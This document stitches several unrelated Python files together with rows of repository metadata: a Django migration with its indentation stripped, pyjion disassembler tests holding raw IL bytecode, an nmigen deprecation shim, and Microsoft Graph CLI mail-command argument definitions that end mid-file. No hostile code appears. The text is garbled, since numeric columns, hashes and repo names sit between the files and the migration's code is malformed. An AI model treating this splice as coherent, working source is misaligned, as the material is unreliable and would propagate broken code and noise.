from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('meta', '0017_adding_image_products'),
]
operations = [
migrations.AlterField(
model_name='camera',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='cameraset',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='controlpoint',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='coordinatesystem',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='coordinatetransform',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='image',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='imageset',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='pointcloud',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='satteleventresult',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='satteleventtrigger',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='sattelgeometryobject',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='sattelsite',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='scene',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='tiepoint',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='tiepointset',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='voxelworld',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
]
| 32.354167
| 62
| 0.54604
| 261
| 3,106
| 6.344828
| 0.214559
| 0.193237
| 0.241546
| 0.280193
| 0.755435
| 0.755435
| 0.755435
| 0.755435
| 0.755435
| 0.724638
| 0
| 0.009929
| 0.31906
| 3,106
| 95
| 63
| 32.694737
| 0.77305
| 0.021893
| 0
| 0.727273
| 1
| 0
| 0.139044
| 0.008567
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.022727
| 0
| 0.056818
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b70c6b66d0104b863b6003ebe238cb0a2560955c
| 5,526
|
py
|
Python
|
Tests/test_dis.py
|
tonybaloney/Pyjion
|
eb54f950ae9dae01c4738c1e8926681681c24b75
|
[
"MIT"
] | 1,137
|
2020-10-14T10:24:18.000Z
|
2022-03-31T09:37:03.000Z
|
Tests/test_dis.py
|
tonybaloney/Pyjion
|
eb54f950ae9dae01c4738c1e8926681681c24b75
|
[
"MIT"
] | 310
|
2016-05-21T05:30:23.000Z
|
2022-03-21T00:59:57.000Z
|
Tests/test_dis.py
|
tonybaloney/Pyjion
|
eb54f950ae9dae01c4738c1e8926681681c24b75
|
[
"MIT"
] | 55
|
2016-05-20T06:11:28.000Z
|
2022-03-15T12:48:00.000Z
|
from pyjion.dis import print_il, dis, dis_native
import pyjion
import sys
import pytest
import platform
def test_offsets():
    def _f(x):
        return x / 2
    assert _f(4) == 2.0
    offsets = pyjion.offsets(_f)
    assert len(offsets) > 7
def test_dis(capsys):
    def test_f():
        numbers = (1, 2, 3, 4)
        return sum(numbers)
    assert test_f() == 10
    dis(test_f)
    captured = capsys.readouterr()
    assert "ldarg.1" in captured.out
def test_dis_with_offsets(capsys):
    def test_f():
        numbers = (1, 2, 3, 4)
        return sum(numbers)
    assert test_f() == 10
    dis(test_f, True)
    captured = capsys.readouterr()
    assert "ldarg.1" in captured.out
    assert "// 0 LOAD_CONST - 1 ((1, 2, 3, 4))" in captured.out
def test_dis_with_no_pc(capsys):
    def test_f():
        numbers = (1, 2, 3, 4)
        return sum(numbers)
    assert test_f() == 10
    dis(test_f, False, False)
    captured = capsys.readouterr()
    assert "ldarg.1" in captured.out
def test_fat_static(capsys):
    test_method = bytearray(
b'\x03 h\x00\x00\x00\xd3X\n\x03(A\x00\x00\x00\x16\r!0\x19Rc\xd1\x7f\x00\x00\xd3% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x18T\x13\n\x03 h\x01\x00\x00\xd3XM\x03 h\x01\x00\x00\xd3X\x11\n\xdf(\x10\x00\x00\x00!P\x19Rc\xd1\x7f\x00\x00\xd3% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1cT\x13\n\x03 p\x01\x00\x00\xd3XM\x03 p\x01\x00\x00\xd3X\x11\n\xdf(\x10\x00\x00\x00!p\x19Rc\xd1\x7f\x00\x00\xd3% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\nT\x13\n\x03 x\x01\x00\x00\xd3XM\x03 x\x01\x00\x00\xd3X\x11\n\xdf(\x10\x00\x00\x00!\x90\x19Rc\xd1\x7f\x00\x00\xd3% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x0eT\x13\n\x03 \x80\x01\x00\x00\xd3XM\x03 \x80\x01\x00\x00\xd3X\x11\n\xdf(\x10\x00\x00\x00\x06\x1f\x10T\x03 h\x01\x00\x00\xd3XM%\x0c\x16\xd3@\x1a\x00\x00\x00!0 nc\xd1\x7f\x00\x00\xd3(:\x00\x00\x00\x03(8\x00\x00\x008G\x01\x00\x00\x08% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x12T\x03 p\x01\x00\x00\xd3XM%\x0c\x16\xd3@\x1c\x00\x00\x00!\xf0\xbeac\xd1\x7f\x00\x00\xd3(:\x00\x00\x00\x03(8\x00\x00\x00\x13\x0b8\x07\x01\x00\x00\x08% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x14T(\x00\x00\x00\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03(8\x00\x00\x008\xdc\x00\x00\x00\x08\x06\x1f\x16T\x03 x\x01\x00\x00\xd3XM%\x0c\x16\xd3@\x1c\x00\x00\x00!\xb0\x8c]c\xd1\x7f\x00\x00\xd3(:\x00\x00\x00\x03(8\x00\x00\x00\x13\x0b8\xa9\x00\x00\x00\x08% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x18T(\x00\x00\x00\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03(8\x00\x00\x008~\x00\x00\x00\x08\x06\x1f\x1aT\x03 \x80\x01\x00\x00\xd3XM%\x0c\x16\xd3@\x1c\x00\x00\x00!\xb0\x8b]c\xd1\x7f\x00\x00\xd3(:\x00\x00\x00\x03(8\x00\x00\x00\x13\x0b8K\x00\x00\x00\x08% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x1cT(\x00\x00\x00\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03(8\x00\x00\x008 \x00\x00\x00\x08\x06\x1f\x1eT\x0b8\x1c\x00\x00\x00\t\x16>\t\x00\x00\x00&&&\t\x19\xda\r+\xf08\x00\x00\x00\x00\x16\xd38\x01\x00\x00\x00\x07\x03(B\x00\x00\x00*')
    print_il(test_method, symbols={})
    captured = capsys.readouterr()
    assert "ldarg.1" in captured.out
def test_thin(capsys):
    test_method = bytearray(b'\x03 h\x00\x00\x00\xd3X\n\x03(A\x00\x00\x00\x16\r\x06 '
b'\x00\x00\x00\x00\xd3T\x03!\xb0\xc6V)\x91\x7f\x00\x00\xd3('
b'\x00\x00\x03\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03('
b'8\x00\x00\x008\x91\x00\x00\x00\x08\x06 '
b'\x02\x00\x00\x00\xd3T!\xf0\xc3\x13*\x91\x7f\x00\x00\xd3% '
b'\x00\x00\x00\x00\xd3X%J\x17XT\x06 \x04\x00\x00\x00\xd3T('
b'\x01\x00\x01\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03('
b'8\x00\x00\x008P\x00\x00\x00\x08\x06 \x06\x00\x00\x00\xd3T(\x10\x00\x00\x00\x06 '
b'\x08\x00\x00\x00\xd3T!\xe0\x1e\xda\x02\x01\x00\x00\x00\xd3% '
b'\x00\x00\x00\x00\xd3X%J\x17XT\x06 '
b'\n\x00\x00\x00\xd3T\x0b\xdd\x1c\x00\x00\x00\t\x16>\t\x00\x00\x00&&&\x19\tY\r+\xf08'
b'\x00\x00\x00\x00\x16\xd38\x01\x00\x00\x00\x07\x03(B\x00\x00\x00*')
    print_il(test_method, symbols={})
    captured = capsys.readouterr()
    assert "ldarg.1" in captured.out
@pytest.mark.skipif(sys.platform.startswith("win"), reason="no windows support yet")
@pytest.mark.skipif(platform.machine() != 'x86_64', reason="Only X64 supported")
@pytest.mark.external
@pytest.mark.graph
def test_dis_native(capsys):
    def test_f():
        numbers = (1, 2, 3, 4)
        return sum(numbers)
    assert test_f() == 10
    pyjion.disable()
    dis_native(test_f)
    captured = capsys.readouterr()
    assert "PUSH RBP" in captured.out
@pytest.mark.skipif(sys.platform.startswith("win"), reason="no windows support yet")
@pytest.mark.skipif(platform.machine() != 'x86_64', reason="Only X64 supported")
@pytest.mark.external
def test_dis_native_with_offsets(capsys):
    def test_f():
        numbers = (1, 2, 3, 4)
        return sum(numbers)
    assert test_f() == 10
    pyjion.disable()
    dis_native(test_f, True)
    captured = capsys.readouterr()
    assert "PUSH RBP" in captured.out
    assert "; 10 RETURN_VALUE - None (None)" in captured.out
    assert "; METHOD_" in captured.out
def test_symbols():
    def test_f():
        numbers = (1, 2, 3, 4)
        return sum(numbers)
    assert test_f() == 10
    symbols = pyjion.symbols(test_f)
    assert len(symbols) != 0
    names = list(symbols.values())
    assert "METHOD_SUBSCR_LIST_SLICE_REVERSED" in names
| 44.564516
| 1,842
| 0.640065
| 1,002
| 5,526
| 3.471058
| 0.144711
| 0.294997
| 0.20184
| 0.055204
| 0.790397
| 0.761645
| 0.730017
| 0.712478
| 0.704428
| 0.665325
| 0
| 0.229709
| 0.172819
| 5,526
| 123
| 1,843
| 44.926829
| 0.531175
| 0
| 0
| 0.510638
| 0
| 0.117021
| 0.501267
| 0.453674
| 0
| 0
| 0
| 0
| 0.212766
| 1
| 0.170213
| false
| 0
| 0.053191
| 0.010638
| 0.297872
| 0.031915
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b74334522616a59602b0489150332a3bdda00f0a
| 199
|
py
|
Python
|
nmigen/hdl/ast.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 528
|
2020-01-28T18:21:00.000Z
|
2021-12-09T06:27:51.000Z
|
nmigen/hdl/ast.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 360
|
2020-01-28T18:34:30.000Z
|
2021-12-10T08:03:32.000Z
|
nmigen/hdl/ast.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 100
|
2020-02-06T21:55:46.000Z
|
2021-11-25T19:20:44.000Z
|
from amaranth.hdl.ast import *
from amaranth.hdl.ast import __all__
import warnings
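# Importing this shim re-exports amaranth.hdl.ast under the legacy nmigen name
# and nudges callers toward the new namespace via the warning below.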
warnings.warn("instead of nmigen.hdl.ast, use amaranth.hdl.ast",
              DeprecationWarning, stacklevel=2)
| 24.875
| 64
| 0.743719
| 27
| 199
| 5.333333
| 0.555556
| 0.166667
| 0.291667
| 0.25
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006024
| 0.165829
| 199
| 7
| 65
| 28.428571
| 0.861446
| 0
| 0
| 0
| 0
| 0
| 0.236181
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3f85728493379361b2c836f288699eeec472df90
| 113,793
|
py
|
Python
|
msgraph-cli-extensions/v1_0/mail_v1_0/azext_mail_v1_0/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/v1_0/mail_v1_0/azext_mail_v1_0/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/v1_0/mail_v1_0/azext_mail_v1_0/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from msgraph.cli.core.commands.parameters import (
get_three_state_flag,
get_enum_type
)
from msgraph.cli.core.commands.validators import validate_file_or_dict
from azext_mail_v1_0.action import (
AddMailUserCreateMailFolderMultiValueExtendedProperties,
AddMailUserCreateMailFolderSingleValueExtendedProperties,
AddBody,
AddInternetMessageHeaders,
AddAttachments,
AddExtensions,
AddMailUserCreateMessageMultiValueExtendedProperties,
AddMailUserCreateMessageSingleValueExtendedProperties,
AddEmailAddress,
AddCompletedDateTime,
AddWithinSizeRange
)
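# load_arguments() below registers the parameters for every command in the
# generated `mail` command group; each argument_context block corresponds to
# one command (create/update/delete/list/show on folders, messages and rules).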
def load_arguments(self, _):
with self.argument_context('mail user create-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('child_folder_count', type=int, help='The number of immediate child mailFolders in the current '
'mailFolder.')
c.argument('display_name', type=str, help='The mailFolder\'s display name.')
c.argument('parent_folder_id', type=str,
help='The unique identifier for the mailFolder\'s parent mailFolder.')
c.argument('total_item_count', type=int, help='The number of items in the mailFolder.')
c.argument('unread_item_count', type=int, help='The number of items in the mailFolder marked as unread.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the '
'mailFolder. Expected value: json-string/@json-file.')
c.argument('message_rules', type=validate_file_or_dict, help='The collection of rules that apply to the '
'user\'s Inbox folder. Expected value: json-string/@json-file.')
c.argument('messages', type=validate_file_or_dict, help='The collection of messages in the mailFolder. '
'Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMailFolderMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMailFolderSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
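# Note (observation, not generated text): each c.argument() registration above
# surfaces as a command option; following the azure-cli conventions this code
# mirrors, snake_case names such as user_id map to --user-id style flags unless
# an explicit options_list (e.g. ['--id']) is given.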
with self.argument_context('mail user create-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('bcc_recipients', type=validate_file_or_dict, help='The Bcc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('body', action=AddBody, nargs='+', help='itemBody')
c.argument('body_preview', type=str,
help='The first 255 characters of the message body. It is in text format.')
c.argument('cc_recipients', type=validate_file_or_dict, help='The Cc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('conversation_id', type=str, help='The ID of the conversation the email belongs to.')
c.argument('conversation_index', help='Indicates the position of the message within the conversation.')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether the message has '
'attachments. This property doesn\'t include inline attachments, so if a message contains only '
'inline attachments, this property is false. To verify the existence of inline attachments, parse '
'the body property to look for a src attribute, such as <IMG src=\'cid:image001.jpg@01D26CD8.6C05F07'
'0\'>.')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='')
c.argument('inference_classification', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('internet_message_headers', action=AddInternetMessageHeaders, nargs='+', help='A collection of '
'message headers defined by RFC5322. The set includes message headers indicating the network path '
'taken by a message from the sender to the recipient. It can also contain custom message headers '
'that hold app data for the message. Returned only on applying a $select query option. Read-only.')
c.argument('internet_message_id', type=str, help='The message ID in the format specified by RFC2822.')
c.argument('is_delivery_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('is_draft', arg_type=get_three_state_flag(), help='Indicates whether the message is a draft. A '
'message is a draft if it hasn\'t been sent yet.')
c.argument('is_read', arg_type=get_three_state_flag(), help='Indicates whether the message has been read.')
c.argument('is_read_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('parent_folder_id', type=str, help='The unique identifier for the message\'s parent mailFolder.')
c.argument('received_date_time', help='The date and time the message was received.')
c.argument('reply_to', type=validate_file_or_dict, help='The email addresses to use when replying. Expected '
'value: json-string/@json-file.')
c.argument('sent_date_time', help='The date and time the message was sent.')
c.argument('subject', type=str, help='The subject of the message.')
c.argument('to_recipients', type=validate_file_or_dict, help='The To: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('unique_body', action=AddBody, nargs='+', help='itemBody')
c.argument('web_link', type=str, help='The URL to open the message in Outlook Web App.You can append an '
'ispopout argument to the end of the URL to change how the message is displayed. If ispopout is not '
'present or if it is set to 1, then the message is shown in a popout window. If ispopout is set to '
'0, then the browser will show the message in the Outlook Web App review pane.The message will open '
'in the browser if you are logged in to your mailbox via Outlook Web App. You will be prompted to '
'login if you are not already logged in with the browser.This URL can be accessed from within an '
'iFrame.')
c.argument('attachments', action=AddAttachments, nargs='+', help='The fileAttachment and itemAttachment '
'attachments for the message.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the message. Nullable.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMessageMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the message. '
'Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMessageSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the message. '
'Nullable.')
c.argument('email_address', action=AddEmailAddress, nargs='+', help='emailAddress', arg_group='Sender')
c.argument('microsoft_graph_email_address', action=AddEmailAddress, nargs='+', help='emailAddress',
arg_group='From')
c.argument('completed_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
c.argument('due_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone', arg_group='Flag')
c.argument('flag_status', arg_type=get_enum_type(['notFlagged', 'complete', 'flagged']), help='',
arg_group='Flag')
c.argument('start_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
with self.argument_context('mail user delete-inference-classification') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user delete-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user delete-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user list-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user list-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user show-inference-classification') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user show-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user show-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user update-inference-classification') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('overrides', type=validate_file_or_dict, help='A set of overrides for a user to always classify '
'messages from specific senders in certain ways: focused, or other. Read-only. Nullable. Expected '
'value: json-string/@json-file.')
with self.argument_context('mail user update-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('child_folder_count', type=int, help='The number of immediate child mailFolders in the current '
'mailFolder.')
c.argument('display_name', type=str, help='The mailFolder\'s display name.')
c.argument('parent_folder_id', type=str,
help='The unique identifier for the mailFolder\'s parent mailFolder.')
c.argument('total_item_count', type=int, help='The number of items in the mailFolder.')
c.argument('unread_item_count', type=int, help='The number of items in the mailFolder marked as unread.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the '
'mailFolder. Expected value: json-string/@json-file.')
c.argument('message_rules', type=validate_file_or_dict, help='The collection of rules that apply to the '
'user\'s Inbox folder. Expected value: json-string/@json-file.')
c.argument('messages', type=validate_file_or_dict, help='The collection of messages in the mailFolder. '
'Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMailFolderMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMailFolderSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
with self.argument_context('mail user update-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('bcc_recipients', type=validate_file_or_dict, help='The Bcc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('body', action=AddBody, nargs='+', help='itemBody')
c.argument('body_preview', type=str,
help='The first 255 characters of the message body. It is in text format.')
c.argument('cc_recipients', type=validate_file_or_dict, help='The Cc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('conversation_id', type=str, help='The ID of the conversation the email belongs to.')
c.argument('conversation_index', help='Indicates the position of the message within the conversation.')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether the message has '
'attachments. This property doesn\'t include inline attachments, so if a message contains only '
'inline attachments, this property is false. To verify the existence of inline attachments, parse '
'the body property to look for a src attribute, such as <IMG src=\'cid:image001.jpg@01D26CD8.6C05F07'
'0\'>.')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='')
c.argument('inference_classification', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('internet_message_headers', action=AddInternetMessageHeaders, nargs='+', help='A collection of '
'message headers defined by RFC5322. The set includes message headers indicating the network path '
'taken by a message from the sender to the recipient. It can also contain custom message headers '
'that hold app data for the message. Returned only on applying a $select query option. Read-only.')
c.argument('internet_message_id', type=str, help='The message ID in the format specified by RFC2822.')
c.argument('is_delivery_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('is_draft', arg_type=get_three_state_flag(), help='Indicates whether the message is a draft. A '
'message is a draft if it hasn\'t been sent yet.')
c.argument('is_read', arg_type=get_three_state_flag(), help='Indicates whether the message has been read.')
c.argument('is_read_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('parent_folder_id', type=str, help='The unique identifier for the message\'s parent mailFolder.')
c.argument('received_date_time', help='The date and time the message was received.')
c.argument('reply_to', type=validate_file_or_dict, help='The email addresses to use when replying. Expected '
'value: json-string/@json-file.')
c.argument('sent_date_time', help='The date and time the message was sent.')
c.argument('subject', type=str, help='The subject of the message.')
c.argument('to_recipients', type=validate_file_or_dict, help='The To: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('unique_body', action=AddBody, nargs='+', help='itemBody')
c.argument('web_link', type=str, help='The URL to open the message in Outlook Web App.You can append an '
'ispopout argument to the end of the URL to change how the message is displayed. If ispopout is not '
'present or if it is set to 1, then the message is shown in a popout window. If ispopout is set to '
'0, then the browser will show the message in the Outlook Web App review pane.The message will open '
'in the browser if you are logged in to your mailbox via Outlook Web App. You will be prompted to '
'login if you are not already logged in with the browser.This URL can be accessed from within an '
'iFrame.')
c.argument('attachments', action=AddAttachments, nargs='+', help='The fileAttachment and itemAttachment '
'attachments for the message.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the message. Nullable.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMessageMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the message. '
'Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMessageSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the message. '
'Nullable.')
c.argument('email_address', action=AddEmailAddress, nargs='+', help='emailAddress', arg_group='Sender')
c.argument('microsoft_graph_email_address', action=AddEmailAddress, nargs='+', help='emailAddress',
arg_group='From')
c.argument('completed_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
c.argument('due_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone', arg_group='Flag')
c.argument('flag_status', arg_type=get_enum_type(['notFlagged', 'complete', 'flagged']), help='',
arg_group='Flag')
c.argument('start_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
with self.argument_context('mail user-inference-classification create-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('classify_as', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('sender_email_address', action=AddEmailAddress, nargs='+', help='emailAddress')
with self.argument_context('mail user-inference-classification delete-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('inference_classification_override_id', type=str,
help='key: id of inferenceClassificationOverride')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-inference-classification list-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-inference-classification show-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('inference_classification_override_id', type=str,
help='key: id of inferenceClassificationOverride')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-inference-classification update-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('inference_classification_override_id', type=str,
help='key: id of inferenceClassificationOverride')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('classify_as', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('sender_email_address', action=AddEmailAddress, nargs='+', help='emailAddress')
with self.argument_context('mail user-mail-folder create-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('child_folder_count', type=int, help='The number of immediate child mailFolders in the current '
'mailFolder.')
